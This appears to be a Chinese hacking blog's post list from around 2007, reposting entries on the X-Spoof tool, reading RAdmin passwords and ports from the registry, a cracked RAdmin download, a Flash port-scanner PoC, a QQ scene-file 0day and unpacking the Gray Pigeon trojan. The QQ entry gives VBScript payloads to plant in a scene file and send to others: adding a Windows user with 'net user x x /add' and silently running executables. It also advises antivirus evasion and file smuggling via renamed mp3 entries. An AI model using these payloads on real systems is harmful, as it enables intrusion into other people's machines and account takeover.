X-Spoof
鬼仔注:X-Spoof前段时间很火,据说还可以卖钱,现在有人放出来了。我也转过来。不过刚才 百度 了一下,发现前几天就有人提供下载了。不知道X-Spoof是什么的朋友, Google 一下吧。
来源:小浩's Blog
下载地址:X-Spoof.rar
X-Spoof v1.3.3说明:
阅读全文 »
鬼仔注:X-Spoof前段时间很火,据说还可以卖钱,现在有人放出来了。我也转过来。不过刚才 百度 了一下,发现前几天就有人提供下载了。不知道X-Spoof是什么的朋友, Google 一下吧。
来源:小浩's Blog
下载地址:X-Spoof.rar
X-Spoof v1.3.3说明:
阅读全文 »
转载请保留版权信息!谢谢合作!
by NetPatch
welcome www.nspcn.org and www.icehack.com
最近做渗透测试时常碰到RADMIN一类的东西..
一碰到此类的程序,一般我都会先看下对方把RADMIN的端口配置成什么..以及相应的PASS(加密过的)
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter //默认密码注册表位置
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
//把海阳读出来的,用逗号格开,然后用下面的代码转换就可以了
鬼仔注:刚才在冰点看到这个,大家现在用的radmin最多的版本应该2.1、2.2,3.0的用的最多的应该是当初影子汉化的那个,几年前的了,但是我记得当初影子说那个并不算是真正的3.0,后来影子好像也消失了。官方的3.0一直没有破解,前段时间我在国外坛子上下了一个据说是破解的,但是下来之后才知道压缩包加密了,而且没有公布密码,现在这里有个破解的,希望对大家有用。我很喜欢radmin,特别是他的屏幕传输速度,反正我是没有见过相同情况下比radmin的屏幕传输速度更快的远控软件(终端除外,终端应该不算远控软件)。
转自:http://blog.chinaunix.net/u/21012/showart_351063.html
服务端3.0.0.5:
http://www.2baksa.net/news/15204/ (服务程序+破解补丁)
阅读全文 »
鬼仔注:演示页面中有源码。
来源:茄子乱语(s0n9's Blog)
利用ActionScript 3的套接字类和脚本事件,FLASH也能变成一个扫描器,恐怖咯~小心媒体文件.
老外放了一个POC,资料很详细.
http://scan.flashsec.org/
Tags: Flashupdate(2007.8.14 22:00):在雕牌那里看到了点相关资料,更新下。补充在下面。
鬼仔注:我这里测试有的成功,有的不成功,原因不明。同样的版本的情况下,有的成功,有的失败。比如同样的beta1,有的失败,有的成功,beta4也有的失败,有的成功。当然,VBScript.qqs中的脚本可以自己修改,达到别的目的。利用场景。懒得贴图了,自己测试吧。
来源:Crab's Blog
把那3个文件解到\Tencent\QQ\IMScene\Scene\
用记事本打开VBScript.qqs
最下边 有那个代码了
然后在场景中发给别人
下载:qq.rar
相关资料(来源:雕牌's blog)
关于那QQ 0day 一点资料,现在把具体过程写出来,大家看看吧,也许有人能突破。我在blog上早就说明了,我不装B,这个QQ的测试,我从没拿外面的人测试,你们说,我算是装B么。再说了,我blog写这个的时候就说过,还在测试中,从没说已经成功利用,一直卡在执行文件那一步。
测试过程:
一开始和教主测试的时候是因为ms的播放器能够播放swf文件。这个我在上个月就写过文章了,当初是测试QQ场景的播放器,但是发现无法触发这个漏洞,因为这个播放器不是使用的MS播放的。所以后来教主貌似去测试别的东西了,我呢,继续测这个QQ,前几天测试的时候做了几个包,有弹框框的包,有传exe的包,有使对放QQ崩溃的包。这个QQ的漏洞想必大家应该都清楚了。我还是简单说说。
问题文件确实是在QQ场景里面,场景里面有一个图片文件和VBScript.qqs,Config.qqs,文件。每个文件的具体作用简单说说,那个图片文件不用说了,就是场景的背景。Config.qqs文件的内容是:
<?xml version="1.0" encoding="gb2312"?><theme ver="1" GUID="8B7A99E866CC454DBE2A7F6238EE8F20">
<Scene Type="1" BackGroupColor="#FFFFFF" FriendCaptionColor="#0000FF" MineCaptionColor="#000000" MsgTextColor="#000000" SystemRequestColor="#000000" SystemResultColor="#000000">
<Normal>
<SOUND Loop="true" SourcePath="E000001.mp3"/>
</Normal>
<Action name="动作01" type="1">
<ActionData>
<SOUND UseNormalSound="false" Loop="true" SourcePath="E000001.mp3"/>
</ActionData>
</Action>
</Scene>
</theme>
一目了然。VBScript.qqs这个文件的作用是一段些'动画参数,初始化帧动画参数,初始化背景图片位置,场景窗口大小改变的时候重新布置场景等等事件的脚本。看文件名字就知道是VBS脚本。
但是这个VBS脚本不是用winds下的vbs.dll解析的,而是用的QQ自己目录下的一个vbs*.dll文件解析的。VBS能做什么,大家比我再清楚不过了,VBS下载者,执行,病毒。功能强大。加用户什么的都是轻而易举。这里给几个VBS脚本出来,大家如果对这个漏洞还有兴趣,可以自己去测试测试,
add user:
dim objshell
set objshell = wscript.createOBject("wscript.shell")
iReturn = objshell.Run("net user x x /add",0,TRUE)
run dos exe:
dim ws
Set ws = WScript.CreateObject("WScript.Shell")
iReturn = ws.Run("test.exe",0,TRUE)
run gui exe:
dim wsh
dim Js1
Js1 ="t1est.exe"
set wsh=WScript.CreateObject("WScript.Shell")
wsh.Run(Js1)
还有如果用VBS下载着记得免杀,因为测试的时候被杀,所以后来才去研究传任意文件。那么如何传任意文件,下面介绍的这个方法在我们测试期间都成功过,但是今天测试的时候貌似不成功。方法写出来。
这个方法也是在研究swf的时候发现的,因为制作场景不支持添加swf文件。后来就想办法。先制作QQ安装包,里面添加音乐。那音乐就是swf改后缀的文件。添加后再生成包。再用UE或者别的16进制编辑的。查找里面mp3后缀,改掉就成了。这个地方也许还有研究,就是他生成的文件为什么一定在QQ的 IMScene\Scene\这个目录呢,如果在这里就能改变他的路径,直接写到启动里面不就OK了,关于这个我没测试成功,还等待各位牛人发现。再次申明这个传任意文件的这个漏洞貌似TX已经封了,不是很清楚,也许今天测试掉了步骤。关于这个漏洞大家有什么看法,或者新的想法,可以跟帖,欢迎一起测试。
【文章标题】: 小菜T4nk手把手教你手脱灰鸽子2007 Beta 2最新版
【文章作者】: T4nk
【作者邮箱】: [email protected]
【作者主页】: http://www.upx.com.cn
【软件名称】: 灰鸽子2007 Beta 2
【软件大小】: 1.71M
【加壳方式】: ASProtect 1.22 – 1.23 Beta 21 -> Alexey Solodovnikov
【保护方式】: ASProtect
【编写语言】: Delphi
【使用工具】: peid Od importrec
【操作平台】: Windows Xp Sp2
【软件介绍】: 国内知名的远程管理软件(比较有名的国内木马)
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
先用peid查下壳ASProtect 阅读全文 »
Tags: 灰鸽子